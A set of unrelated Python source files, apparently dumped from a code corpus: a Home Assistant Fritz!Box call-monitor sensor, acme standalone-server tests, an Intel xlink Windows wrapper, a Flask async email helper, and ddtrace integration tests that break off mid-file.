vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_PASSWORD, default='admin'): cv.string,
vol.Optional(CONF_USERNAME, default=''): cv.string,
vol.Optional(CONF_PHONEBOOK, default=0): cv.positive_int,
vol.Optional(CONF_PREFIXES, default=[]):
vol.All(cv.ensure_list, [cv.string])
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up Fritz!Box call monitor sensor platform."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
phonebook_id = config.get('phonebook')
prefixes = config.get('prefixes')
try:
phonebook = FritzBoxPhonebook(
host=host, port=port, username=username, password=password,
phonebook_id=phonebook_id, prefixes=prefixes)
except: # noqa: E722 pylint: disable=bare-except
phonebook = None
_LOGGER.warning("Phonebook with ID %s not found on Fritz!Box",
phonebook_id)
sensor = FritzBoxCallSensor(name=name, phonebook=phonebook)
add_devices([sensor])
monitor = FritzBoxCallMonitor(host=host, port=port, sensor=sensor)
monitor.connect()
def _stop_listener(_event):
monitor.stopped.set()
hass.bus.listen_once(
EVENT_HOMEASSISTANT_STOP,
_stop_listener
)
return monitor.sock is not None
class FritzBoxCallSensor(Entity):
"""Implementation of a Fritz!Box call monitor."""
def __init__(self, name, phonebook):
"""Initialize the sensor."""
self._state = VALUE_DEFAULT
self._attributes = {}
self._name = name
self.phonebook = phonebook
def set_state(self, state):
"""Set the state."""
self._state = state
def set_attributes(self, attributes):
"""Set the state attributes."""
self._attributes = attributes
@property
def should_poll(self):
"""Only poll to update phonebook, if defined."""
return self.phonebook is not None
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._attributes
def number_to_name(self, number):
"""Return a name for a given phone number."""
if self.phonebook is None:
return 'unknown'
return self.phonebook.get_name(number)
def update(self):
"""Update the phonebook if it is defined."""
if self.phonebook is not None:
self.phonebook.update_phonebook()
class FritzBoxCallMonitor:
"""Event listener to monitor calls on the Fritz!Box."""
def __init__(self, host, port, sensor):
"""Initialize Fritz!Box monitor instance."""
self.host = host
self.port = port
self.sock = None
self._sensor = sensor
self.stopped = threading.Event()
def connect(self):
"""Connect to the Fritz!Box."""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(10)
try:
self.sock.connect((self.host, self.port))
threading.Thread(target=self._listen).start()
except socket.error as err:
self.sock = None
_LOGGER.error("Cannot connect to %s on port %s: %s",
self.host, self.port, err)
def _listen(self):
"""Listen to incoming or outgoing calls."""
while not self.stopped.isSet():
try:
response = self.sock.recv(2048)
except socket.timeout:
# if no response after 10 seconds, just recv again
continue
response = str(response, "utf-8")
if not response:
# if the response is empty, the connection has been lost.
# try to reconnect
self.sock = None
while self.sock is None:
self.connect()
time.sleep(INTERVAL_RECONNECT)
else:
line = response.split("\n", 1)[0]
self._parse(line)
time.sleep(1)
def _parse(self, line):
"""Parse the call information and set the sensor states."""
line = line.split(";")
df_in = "%d.%m.%y %H:%M:%S"
df_out = "%Y-%m-%dT%H:%M:%S"
isotime = datetime.datetime.strptime(line[0], df_in).strftime(df_out)
if line[1] == "RING":
self._sensor.set_state(VALUE_RING)
att = {"type": "incoming",
"from": line[3],
"to": line[4],
"device": line[5],
"initiated": isotime}
att["from_name"] = self._sensor.number_to_name(att["from"])
self._sensor.set_attributes(att)
elif line[1] == "CALL":
self._sensor.set_state(VALUE_CALL)
att = {"type": "outgoing",
"from": line[4],
"to": line[5],
"device": line[6],
"initiated": isotime}
att["to_name"] = self._sensor.number_to_name(att["to"])
self._sensor.set_attributes(att)
elif line[1] == "CONNECT":
self._sensor.set_state(VALUE_CONNECT)
att = {"with": line[4], "device": line[3], "accepted": isotime}
att["with_name"] = self._sensor.number_to_name(att["with"])
self._sensor.set_attributes(att)
elif line[1] == "DISCONNECT":
self._sensor.set_state(VALUE_DISCONNECT)
att = {"duration": line[3], "closed": isotime}
self._sensor.set_attributes(att)
self._sensor.schedule_update_ha_state()
class FritzBoxPhonebook:
"""This connects to a FritzBox router and downloads its phone book."""
def __init__(self, host, port, username, password,
phonebook_id=0, prefixes=None):
"""Initialize the class."""
self.host = host
self.username = username
self.password = password
self.port = port
self.phonebook_id = phonebook_id
self.phonebook_dict = None
self.number_dict = None
self.prefixes = prefixes or []
# pylint: disable=import-error
import fritzconnection as fc
# Establish a connection to the FRITZ!Box.
self.fph = fc.FritzPhonebook(
address=self.host, user=self.username, password=self.password)
if self.phonebook_id not in self.fph.list_phonebooks:
raise ValueError("Phonebook with this ID not found.")
self.update_phonebook()
@Throttle(MIN_TIME_PHONEBOOK_UPDATE)
def update_phonebook(self):
"""Update the phone book dictionary."""
self.phonebook_dict = self.fph.get_all_names(self.phonebook_id)
self.number_dict = {re.sub(r'[^\d\+]', '', nr): name
for name, nrs in self.phonebook_dict.items()
for nr in nrs}
_LOGGER.info("Fritz!Box phone book successfully updated")
def get_name(self, number):
"""Return a name for a given phone number."""
number = re.sub(r'[^\d\+]', '', str(number))
if self.number_dict is None:
return 'unknown'
try:
return self.number_dict[number]
except KeyError:
pass
if self.prefixes:
for prefix in self.prefixes:
try:
return self.number_dict[prefix + number]
except KeyError:
pass
try:
return self.number_dict[prefix + number.lstrip('0')]
except KeyError:
pass
return 'unknown'
|
standalone_test.py
|
"""Tests for acme.standalone."""
import multiprocessing
import os
import shutil
import socket
import threading
import tempfile
import unittest
import time
from contextlib import closing
from six.moves import http_client # pylint: disable=import-error
from six.moves import socketserver # type: ignore # pylint: disable=import-error
import josepy as jose
import mock
import requests
from acme import challenges
from acme import crypto_util
from acme import errors
from acme import test_util
from acme.magic_typing import Set # pylint: disable=unused-import, no-name-in-module
class TLSServerTest(unittest.TestCase):
"""Tests for acme.standalone.TLSServer."""
def test_bind(self): # pylint: disable=no-self-use
from acme.standalone import TLSServer
server = TLSServer(
('', 0), socketserver.BaseRequestHandler, bind_and_activate=True)
server.server_close() # pylint: disable=no-member
def test_ipv6(self):
if socket.has_ipv6:
from acme.standalone import TLSServer
server = TLSServer(
('', 0), socketserver.BaseRequestHandler, bind_and_activate=True, ipv6=True)
server.server_close() # pylint: disable=no-member
class TLSSNI01ServerTest(unittest.TestCase):
"""Test for acme.standalone.TLSSNI01Server."""
def setUp(self):
self.certs = {b'localhost': (
test_util.load_pyopenssl_private_key('rsa2048_key.pem'),
test_util.load_cert('rsa2048_cert.pem'),
)}
from acme.standalone import TLSSNI01Server
self.server = TLSSNI01Server(('localhost', 0), certs=self.certs)
# pylint: disable=no-member
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown() # pylint: disable=no-member
self.thread.join()
def test_it(self):
host, port = self.server.socket.getsockname()[:2]
cert = crypto_util.probe_sni(
b'localhost', host=host, port=port, timeout=1)
self.assertEqual(jose.ComparableX509(cert),
jose.ComparableX509(self.certs[b'localhost'][1]))
class HTTP01ServerTest(unittest.TestCase):
"""Tests for acme.standalone.HTTP01Server."""
def setUp(self):
self.account_key = jose.JWK.load(
test_util.load_vector('rsa1024_key.pem'))
self.resources = set() # type: Set
from acme.standalone import HTTP01Server
self.server = HTTP01Server(('', 0), resources=self.resources)
# pylint: disable=no-member
self.port = self.server.socket.getsockname()[1]
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown() # pylint: disable=no-member
self.thread.join()
def test_index(self):
response = requests.get(
'http://localhost:{0}'.format(self.port), verify=False)
self.assertEqual(
response.text, 'ACME client standalone challenge solver')
self.assertTrue(response.ok)
def test_404(self):
response = requests.get(
'http://localhost:{0}/foo'.format(self.port), verify=False)
self.assertEqual(response.status_code, http_client.NOT_FOUND)
def _test_http01(self, add):
chall = challenges.HTTP01(token=(b'x' * 16))
response, validation = chall.response_and_validation(self.account_key)
from acme.standalone import HTTP01RequestHandler
resource = HTTP01RequestHandler.HTTP01Resource(
chall=chall, response=response, validation=validation)
if add:
self.resources.add(resource)
return resource.response.simple_verify(
resource.chall, 'localhost', self.account_key.public_key(),
port=self.port)
def test_http01_found(self):
self.assertTrue(self._test_http01(add=True))
def test_http01_not_found(self):
self.assertFalse(self._test_http01(add=False))
class BaseDualNetworkedServersTest(unittest.TestCase):
"""Test for acme.standalone.BaseDualNetworkedServers."""
class SingleProtocolServer(socketserver.TCPServer):
"""Server that only serves on a single protocol. FreeBSD has this behavior for AF_INET6."""
def __init__(self, *args, **kwargs):
ipv6 = kwargs.pop("ipv6", False)
if ipv6:
self.address_family = socket.AF_INET6
kwargs["bind_and_activate"] = False
else:
self.address_family = socket.AF_INET
socketserver.TCPServer.__init__(self, *args, **kwargs)
if ipv6:
# NB: On Windows, socket.IPPROTO_IPV6 constant may be missing.
# We use the corresponding value (41) instead.
level = getattr(socket, "IPPROTO_IPV6", 41)
# pylint: disable=no-member
self.socket.setsockopt(level, socket.IPV6_V6ONLY, 1)
try:
self.server_bind()
self.server_activate()
except:
self.server_close()
raise
@mock.patch("socket.socket.bind")
def test_fail_to_bind(self, mock_bind):
mock_bind.side_effect = socket.error
from acme.standalone import BaseDualNetworkedServers
self.assertRaises(socket.error, BaseDualNetworkedServers,
BaseDualNetworkedServersTest.SingleProtocolServer,
('', 0),
socketserver.BaseRequestHandler)
def test_ports_equal(self):
from acme.standalone import BaseDualNetworkedServers
servers = BaseDualNetworkedServers(
BaseDualNetworkedServersTest.SingleProtocolServer,
('', 0),
socketserver.BaseRequestHandler)
socknames = servers.getsocknames()
prev_port = None
# assert ports are equal
for sockname in socknames:
port = sockname[1]
if prev_port:
self.assertEqual(prev_port, port)
prev_port = port
class TLSSNI01DualNetworkedServersTest(unittest.TestCase):
"""Test for acme.standalone.TLSSNI01DualNetworkedServers."""
def setUp(self):
self.certs = {b'localhost': (
test_util.load_pyopenssl_private_key('rsa2048_key.pem'),
test_util.load_cert('rsa2048_cert.pem'),
)}
from acme.standalone import TLSSNI01DualNetworkedServers
self.servers = TLSSNI01DualNetworkedServers(('localhost', 0), certs=self.certs)
self.servers.serve_forever()
def tearDown(self):
self.servers.shutdown_and_server_close()
def test_connect(self):
socknames = self.servers.getsocknames()
# connect to all addresses
for sockname in socknames:
host, port = sockname[:2]
cert = crypto_util.probe_sni(
b'localhost', host=host, port=port, timeout=1)
self.assertEqual(jose.ComparableX509(cert),
jose.ComparableX509(self.certs[b'localhost'][1]))
class HTTP01DualNetworkedServersTest(unittest.TestCase):
"""Tests for acme.standalone.HTTP01DualNetworkedServers."""
def setUp(self):
self.account_key = jose.JWK.load(
test_util.load_vector('rsa1024_key.pem'))
self.resources = set() # type: Set
from acme.standalone import HTTP01DualNetworkedServers
self.servers = HTTP01DualNetworkedServers(('', 0), resources=self.resources)
# pylint: disable=no-member
self.port = self.servers.getsocknames()[0][1]
self.servers.serve_forever()
def tearDown(self):
self.servers.shutdown_and_server_close()
def test_index(self):
response = requests.get(
'http://localhost:{0}'.format(self.port), verify=False)
self.assertEqual(
response.text, 'ACME client standalone challenge solver')
self.assertTrue(response.ok)
def test_404(self):
response = requests.get(
'http://localhost:{0}/foo'.format(self.port), verify=False)
self.assertEqual(response.status_code, http_client.NOT_FOUND)
def _test_http01(self, add):
chall = challenges.HTTP01(token=(b'x' * 16))
response, validation = chall.response_and_validation(self.account_key)
from acme.standalone import HTTP01RequestHandler
resource = HTTP01RequestHandler.HTTP01Resource(
chall=chall, response=response, validation=validation)
if add:
self.resources.add(resource)
return resource.response.simple_verify(
resource.chall, 'localhost', self.account_key.public_key(),
port=self.port)
def test_http01_found(self):
self.assertTrue(self._test_http01(add=True))
def test_http01_not_found(self):
self.assertFalse(self._test_http01(add=False))
class TestSimpleTLSSNI01Server(unittest.TestCase):
"""Tests for acme.standalone.simple_tls_sni_01_server."""
def setUp(self):
# mirror ../examples/standalone
self.test_cwd = tempfile.mkdtemp()
localhost_dir = os.path.join(self.test_cwd, 'localhost')
os.makedirs(localhost_dir)
shutil.copy(test_util.vector_path('rsa2048_cert.pem'),
os.path.join(localhost_dir, 'cert.pem'))
shutil.copy(test_util.vector_path('rsa2048_key.pem'),
os.path.join(localhost_dir, 'key.pem'))
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.bind(('', 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.port = sock.getsockname()[1]
from acme.standalone import simple_tls_sni_01_server
self.process = multiprocessing.Process(target=simple_tls_sni_01_server,
args=(['path', '-p', str(self.port)],))
self.old_cwd = os.getcwd()
os.chdir(self.test_cwd)
def tearDown(self):
os.chdir(self.old_cwd)
if self.process.is_alive():
self.process.terminate()
self.process.join(timeout=5)
# Check that we didn't timeout waiting for the process to
# terminate.
self.assertNotEqual(self.process.exitcode, None)
shutil.rmtree(self.test_cwd)
@mock.patch('acme.standalone.TLSSNI01Server.handle_request')
def test_mock(self, handle):
from acme.standalone import simple_tls_sni_01_server
simple_tls_sni_01_server(cli_args=['path', '-p', str(self.port)], forever=False)
self.assertEqual(handle.call_count, 1)
def test_live(self):
self.process.start()
cert = None
for _ in range(50):
time.sleep(0.1)
try:
cert = crypto_util.probe_sni(b'localhost', b'127.0.0.1', self.port)
break
except errors.Error: # pragma: no cover
pass
self.assertEqual(jose.ComparableX509(cert),
test_util.load_comparable_cert('rsa2048_cert.pem'))
if __name__ == "__main__":
unittest.main() # pragma: no cover
|
xlink_windows_wrapper.py
|
"""
Allows API of xlink driver C library to be called in Python.
Copyright (C) 2019-2022 Intel Corporation
SPDX-License-Identifier: Apache-2.0
"""
import logging
import threading
import os
import sys
from typing import Callable
from ctypes import *
import time
from inbm_vision_lib.constants import XLINK_LIB_PATH, MAXIMUM_STORE_FILE_SIZE, XLINK_DATA_SIZE, \
NODE_BUFFER_TIMEOUT, VISION_BUFFER_TIMEOUT
from threading import Lock
from ..constants import VISION
from .ixlink_wrapper import IXlinkWrapper, HOST_DEVICE, PCIE, X_LINK_SUCCESS, xlink_global_handle, xlink_handle
logger = logging.getLogger(__name__)
class XlinkWindowsWrapper(IXlinkWrapper):
"""Wrapper class to use xlink shared library
@param receive_callback: Callback for receiving messages over xlink
@param channel_id: Channel used for xlink communication
@param pcie_num: PCIE number used in connection
@param is_boot_dev: true if xlink boot device API to be called
"""
def __init__(self, receive_callback: Callable, channel_id: int, pcie_num: int, is_boot_dev: bool):
super().__init__(XLINK_LIB_PATH,
receive_callback,
channel_id,
xlink_global_handle(prof_cfg=PCIE),
XLINK_DATA_SIZE,
xlink_handle(dev_type=HOST_DEVICE),
pcie_num)
self._xlink_handler.sw_device_id = self._xlink_pcie_num
self._is_boot_dev = is_boot_dev
self._open_channel_lock = Lock()
self._read_data_lock = Lock()
self.init_thread = threading.Thread(target=self._init_channel)
self.init_thread.start()
self._listen_thread = threading.Thread(target=self._listen_to_channel)
self._listen_thread.daemon = True
def _init_channel(self):
"""Initialize Xlink handler, connect the handler and open channel"""
logger.debug(f'{self._agent} start Xlink Windows initialization.')
self.xlink_init_status_success = False
while self._running:
status = self._xlink_library.xlink_initialize()
if status is X_LINK_SUCCESS:
break
time.sleep(1)
logger.debug(f"PCIE Number: {self._xlink_pcie_num}")
if self._is_boot_dev:
self.boot_device()
xlink_handler_p = byref(self._xlink_handler)
logger.debug('xlink_connect start connecting... Waiting the connection...')
while self._running:
status = self._xlink_library.xlink_connect(xlink_handler_p)
if status is X_LINK_SUCCESS:
logger.debug('xlink_connect pass.')
logger.debug('xlink_open_channel. Channel ID - ' + str(self._channel_id.value))
break
logger.debug('xlink_connect start connecting... Waiting the connection...')
time.sleep(1)
while self._running:
if self._open_channel_lock.acquire():
timeout = VISION_BUFFER_TIMEOUT if self._agent == VISION else NODE_BUFFER_TIMEOUT
try:
status = self._xlink_library.xlink_open_channel(xlink_handler_p, self._channel_id,
self._operation_type,
self._data_size, timeout * 1000)
finally:
self._open_channel_lock.release()
if status is X_LINK_SUCCESS:
logger.debug('xlink_open_channel pass. Channel ID - ' +
str(self._channel_id.value))
# Wait 5 seconds for xlink to stabilize
time.sleep(5)
self.xlink_init_status_success = True
logger.info('Xlink Windows initialization complete.')
break
else:
pass
time.sleep(1)
def get_xlink_device_status(self) -> int:
""" Check the xlink device status.
XLINK_DEV_OFF = 0, // device is off
XLINK_DEV_ERROR, // device is busy and not available
XLINK_DEV_BUSY, // device is available for use
XLINK_DEV_RECOVERY, // device is in recovery mode
XLINK_DEV_READY // device HW failure is detected
@return: status of xlink device
"""
device_status = c_int(0)
# logger.debug('Call xlink get device status for {0}'.format(
# str(self._xlink_handler.sw_device_id)))
if self._running:
status = self._xlink_library.xlink_get_device_status(
byref(self._xlink_handler), byref(device_status))
if status is not X_LINK_SUCCESS:
logger.error('xlink_get device status failed - %s', str(status))
device_status = c_int(-1)
else:
logger.debug('Closing xlink in progress. Will not disrupt it.')
device_status.value = 4
logger.debug('xlink device status for {} is {}'.format(
str(self._xlink_handler.sw_device_id), str(device_status.value)))
return device_status.value
def boot_device(self) -> None:
""" Call xlink API to boot the device.
Only IA vision-agent boot the device. Not support boot VPU FW from node in current stage.
"""
super().boot_device()
def reset_device(self) -> None:
"""Call xlink API to reset the device"""
super().reset_device()
def _register_callback(self) -> None:
"""Register dummy callback to the xlink"""
dummy_callback = c_void_p()
status = self._xlink_library.xlink_data_available_event(byref(self._xlink_handler), self._channel_id,
dummy_callback)
if status is not X_LINK_SUCCESS:
logger.error('Xlink Data Event Failed - %s', str(status))
status = self._xlink_library.xlink_data_consumed_event(byref(self._xlink_handler), self._channel_id,
dummy_callback)
if status is not X_LINK_SUCCESS:
logger.error('Xlink Data Event Failed - %s', str(status))
logger.debug("xlink callback registered.")
def _listen_to_channel(self):
"""Listen the channel and waiting for incoming message"""
s_buffer = create_string_buffer(self._data_size)
message = POINTER(c_char)(s_buffer) # type: ignore
# Waiting xlink initialization complete
while self._running and not self.xlink_init_status_success:
time.sleep(1)
while self._running:
size = c_uint32(XLINK_DATA_SIZE)
while self._running and self._read_data_lock.acquire():
try:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message), byref(size))
if status is X_LINK_SUCCESS:
break
time.sleep(0.1)
finally:
self._read_data_lock.release()
if size.value != 0:
logger.info('Received message size ' + str(size.value) + '. Message is:')
message_combined = ''
for i in range(size.value):
message_combined = message_combined + \
message[i].decode('utf-8') # type: ignore
if i == (int(size.value) - 1):
logger.info('%s', str(message_combined))
self._xlink_release_data()
if self._receive_callback is not None:
logger.info('Receive callback method exist. Call the method.')
self._receive_callback(message_combined)
def receive_file(self, file_save_path: str) -> str:
"""Receive update file and save it to the local repository.
@param file_save_path: local path to save the update file
@return : (str) received file name
"""
super()._check_directory(file_save_path)
logger.debug("Switch to receive file mode.")
s_buffer = create_string_buffer(self._data_size)
message = POINTER(c_char)(s_buffer) # type: ignore
size = c_uint32(XLINK_DATA_SIZE)
# Receive file name
while self._running:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message), byref(size))
if status is X_LINK_SUCCESS:
break
file_name = ""
for i in range(size.value):
file_name = file_name + message[i].decode('utf-8') # type: ignore
self._xlink_release_data()
file_path = os.path.join(file_save_path, file_name)
# Receive number of chunk
size = c_uint32(XLINK_DATA_SIZE)
while self._running:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message), byref(size))
if status is X_LINK_SUCCESS:
break
chunk_message = ""
for i in range(size.value):
chunk_message = chunk_message + message[i].decode('utf-8') # type: ignore
num_of_chunk = int(chunk_message)
self._xlink_release_data()
# Receive update file
logger.info("Receiving file. Please wait......")
if num_of_chunk > 1:
self._download_large_file(file_path, num_of_chunk)
else:
self._download_normal_file(file_path)
self._xlink_release_data()
logger.info("Receiving file size 100%.")
logger.info("Receive file complete. File size: %i", os.path.getsize(file_path))
logger.info("File stored at: %s", file_path)
return file_name
def _download_large_file(self, file_path: str, num_of_chunk: int):
s_buffer = create_string_buffer(self._data_size)
message = POINTER(c_char)(s_buffer) # type: ignore
size = c_uint32(XLINK_DATA_SIZE)
with open(file_path, 'wb') as update_file:
file_collect = b''
for num in range(num_of_chunk):
logger.info("{}/{}".format(num, num_of_chunk - 1))
while self._running:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message),
byref(size))
if status is X_LINK_SUCCESS:
break
file_collect = file_collect + message[:size.value] # type: ignore
# Write to file if file stored in memory larger than the limit or it is the last chunk of file.
if len(file_collect) > MAXIMUM_STORE_FILE_SIZE or num == (num_of_chunk - 1):
logger.debug("write to file")
update_file.write(file_collect) # type: ignore
update_file.flush()
file_collect = b''
if num != (num_of_chunk - 1):
self._xlink_release_data()
def _download_normal_file(self, file_path: str):
s_buffer = create_string_buffer(self._data_size)
message = POINTER(c_char)(s_buffer) # type: ignore
message_size = sys.getsizeof(message)
with open(file_path, 'wb') as update_file:
size = c_uint32(message_size)
while self._running:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message),
byref(size))
if status is X_LINK_SUCCESS:
break
for i in range(size.value):
# Temporary disable the progress bar as it causes slowness in simics.
# progress = receive_file_progress(i, int(size.value))
# if progress:
# logger.info("Receiving file size " + str(progress) + "%")
update_file.write(message[i]) # type: ignore
def get_init_status(self) -> bool:
""" Get the initialization status
@return: boolean representing initialization status
"""
return self.xlink_init_status_success
def start(self) -> None:
"""start to listen the receive channel"""
self._listen_thread.start()
def send(self, message) -> None:
"""Send the message through xlink write data API
@param message: message to be sent
"""
# Waiting xlink initialization complete
while self._running and not self.get_init_status():
time.sleep(1)
if self.get_init_status() and self._running:
logger.debug('Sending message: ' + str(message))
status = self._xlink_library.xlink_write_data(byref(self._xlink_handler), self._channel_id,
message.encode('utf8'),
len(message.encode('utf8')))
super()._check_status(status, 'XLinkWriteData data failed.')
else:
logger.info('Stop XLinkWriteData')
def receive(self, message: str) -> None:
"""Receive message"""
pass
def send_file(self, file_path: str) -> None:
# inherit docstring from superclass
super().write_file_via_unsecured(file_path)
def stop(self, disconnect: bool = False) -> None:
# inherit docstring from superclass
logger.debug('Stopping Xlink.')
self._running = False
while not self._open_channel_lock.acquire():
time.sleep(0.1)
logger.debug('Open channel lock get.')
while not self._read_data_lock.acquire():
time.sleep(0.01)
logger.debug('read_data lock get.')
time.sleep(1)
logger.debug('Close Xlink channel ID - ' + str(self._channel_id.value))
self._xlink_library.xlink_close_channel(byref(self._xlink_handler), self._channel_id)
if disconnect:
# Wait 0.5s to let xlink fully close the channel before disconnecting it.
time.sleep(0.5)
logger.debug('Disconnect Xlink')
self._xlink_library.xlink_disconnect(byref(self._xlink_handler))
|
email.py
|
from threading import Thread
from flask_mail import Message
from app import app, mail
def send(recipient, subject, body):
"""
Send a mail to a recipient. The body is usually a rendered HTML template.
The sender's credentials has been configured in the config.py file.
"""
sender = app.config['ADMINS'][0]
message = Message(subject, sender=sender, recipients=[recipient])
message.html = body
# Create a new thread
thr = Thread(target=send_async, args=[app, message])
thr.start()
def send_async(app, message):
""" Send the mail asynchronously. """
with app.app_context():
mail.send(message)
|
test_integration.py
|
import logging
import os
import subprocess
import sys
import mock
import pytest
import ddtrace
from ddtrace import Tracer
from ddtrace import tracer
from ddtrace.constants import MANUAL_DROP_KEY
from ddtrace.constants import MANUAL_KEEP_KEY
from ddtrace.internal.runtime import container
from ddtrace.internal.writer import AgentWriter
from ddtrace.sampler import DatadogSampler
from ddtrace.sampler import RateSampler
from ddtrace.sampler import SamplingRule
from ddtrace.vendor import six
from tests import AnyFloat
from tests import AnyInt
from tests import AnyStr
from tests import TracerTestCase
from tests import override_global_config
from tests import snapshot
AGENT_VERSION = os.environ.get("AGENT_VERSION")
def test_configure_keeps_api_hostname_and_port():
"""
Ensures that when calling configure without specifying hostname and port,
previous overrides have been kept.
"""
tracer = Tracer()
if AGENT_VERSION == "testagent":
assert tracer.writer.agent_url == "http://localhost:9126"
else:
assert tracer.writer.agent_url == "http://localhost:8126"
tracer.configure(hostname="127.0.0.1", port=8127)
assert tracer.writer.agent_url == "http://127.0.0.1:8127"
tracer.configure(priority_sampling=True)
assert tracer.writer.agent_url == "http://127.0.0.1:8127"
def test_debug_mode():
p = subprocess.Popen(
[sys.executable, "-c", "import ddtrace"],
env=dict(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
p.wait()
assert p.stdout.read() == b""
assert b"DEBUG:ddtrace" not in p.stderr.read()
p = subprocess.Popen(
[sys.executable, "-c", "import ddtrace"],
env=dict(DD_TRACE_DEBUG="true"),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
p.wait()
assert p.stdout.read() == b""
# Stderr should have some debug lines
assert b"DEBUG:ddtrace" in p.stderr.read()
def test_output(tmpdir):
f = tmpdir.join("test.py")
f.write(
"""
import ddtrace
""".lstrip()
)
p = subprocess.Popen(
["ddtrace-run", sys.executable, "test.py"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=str(tmpdir),
)
p.wait()
assert p.stderr.read() == six.b("")
assert p.stdout.read() == six.b("")
assert p.returncode == 0
def test_start_in_thread(tmpdir):
f = tmpdir.join("test.py")
f.write(
"""
import threading
def target():
import ddtrace
t = threading.Thread(target=target)
t.start()
t.join()
""".lstrip()
)
p = subprocess.Popen(
["ddtrace-run", sys.executable, "test.py"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=str(tmpdir),
)
p.wait()
assert p.stderr.read() == six.b("")
assert p.stdout.read() == six.b("")
assert p.returncode == 0
@pytest.mark.skipif(AGENT_VERSION != "latest", reason="Agent v5 doesn't support UDS")
def test_single_trace_uds():
t = Tracer()
sockdir = "/tmp/ddagent/trace.sock"
t.configure(uds_path=sockdir)
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("client.testing").finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_uds_wrong_socket_path():
t = Tracer()
t.configure(uds_path="/tmp/ddagent/nosockethere")
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("client.testing").finish()
t.shutdown()
calls = [
mock.call("failed to send traces to Datadog Agent at %s", "unix:///tmp/ddagent/nosockethere", exc_info=True)
]
log.error.assert_has_calls(calls)
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="FIXME: Test agent doesn't support this for some reason.")
def test_payload_too_large():
t = Tracer()
# Make sure a flush doesn't happen partway through.
t.configure(writer=AgentWriter(processing_interval=1000))
with mock.patch("ddtrace.internal.writer.log") as log:
for i in range(100000):
with t.trace("operation") as s:
s.set_tag(str(i), "b" * 190)
s.set_tag(str(i), "a" * 190)
t.shutdown()
calls = [
mock.call(
"trace buffer (%s traces %db/%db) cannot fit trace of size %db, dropping",
AnyInt(),
AnyInt(),
AnyInt(),
AnyInt(),
)
]
log.warning.assert_has_calls(calls)
log.error.assert_not_called()
def test_large_payload():
t = Tracer()
# Traces are approx. 275 bytes.
# 10,000*275 ~ 3MB
with mock.patch("ddtrace.internal.writer.log") as log:
for i in range(10000):
with t.trace("operation"):
pass
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_child_spans():
t = Tracer()
with mock.patch("ddtrace.internal.writer.log") as log:
spans = []
for i in range(10000):
spans.append(t.trace("op"))
for s in spans:
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_metrics():
with override_global_config(dict(health_metrics_enabled=True)):
t = Tracer()
statsd_mock = mock.Mock()
t.writer.dogstatsd = statsd_mock
assert t.writer._report_metrics
with mock.patch("ddtrace.internal.writer.log") as log:
for _ in range(5):
spans = []
for i in range(3000):
spans.append(t.trace("op"))
for s in spans:
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
statsd_mock.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 5, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 15000, tags=[]),
mock.call("datadog.tracer.http.requests", 1, tags=[]),
mock.call("datadog.tracer.http.sent.bytes", AnyInt()),
],
any_order=True,
)
def test_single_trace_too_large():
t = Tracer()
with mock.patch("ddtrace.internal.writer.log") as log:
with t.trace("huge"):
for i in range(100000):
with tracer.trace("operation") as s:
s.set_tag("a" * 10, "b" * 10)
t.shutdown()
calls = [mock.call("trace (%db) larger than payload limit (%db), dropping", AnyInt(), AnyInt())]
log.warning.assert_has_calls(calls)
log.error.assert_not_called()
def test_trace_bad_url():
t = Tracer()
t.configure(hostname="bad", port=1111)
with mock.patch("ddtrace.internal.writer.log") as log:
with t.trace("op"):
pass
t.shutdown()
calls = [mock.call("failed to send traces to Datadog Agent at %s", "http://bad:1111", exc_info=True)]
log.error.assert_has_calls(calls)
def test_writer_headers():
t = Tracer()
t.writer._put = mock.Mock(wraps=t.writer._put)
with t.trace("op"):
pass
t.shutdown()
assert t.writer._put.call_count == 1
_, headers = t.writer._put.call_args[0]
assert headers.get("Datadog-Meta-Tracer-Version") == ddtrace.__version__
assert headers.get("Datadog-Meta-Lang") == "python"
assert headers.get("Content-Type") == "application/msgpack"
assert headers.get("X-Datadog-Trace-Count") == "1"
if container.get_container_info():
assert "Datadog-Container-Id" in headers
t = Tracer()
t.writer._put = mock.Mock(wraps=t.writer._put)
for _ in range(100):
with t.trace("op"):
pass
t.shutdown()
assert t.writer._put.call_count == 1
_, headers = t.writer._put.call_args[0]
assert headers.get("X-Datadog-Trace-Count") == "100"
t = Tracer()
t.writer._put = mock.Mock(wraps=t.writer._put)
for _ in range(10):
with t.trace("op"):
for _ in range(5):
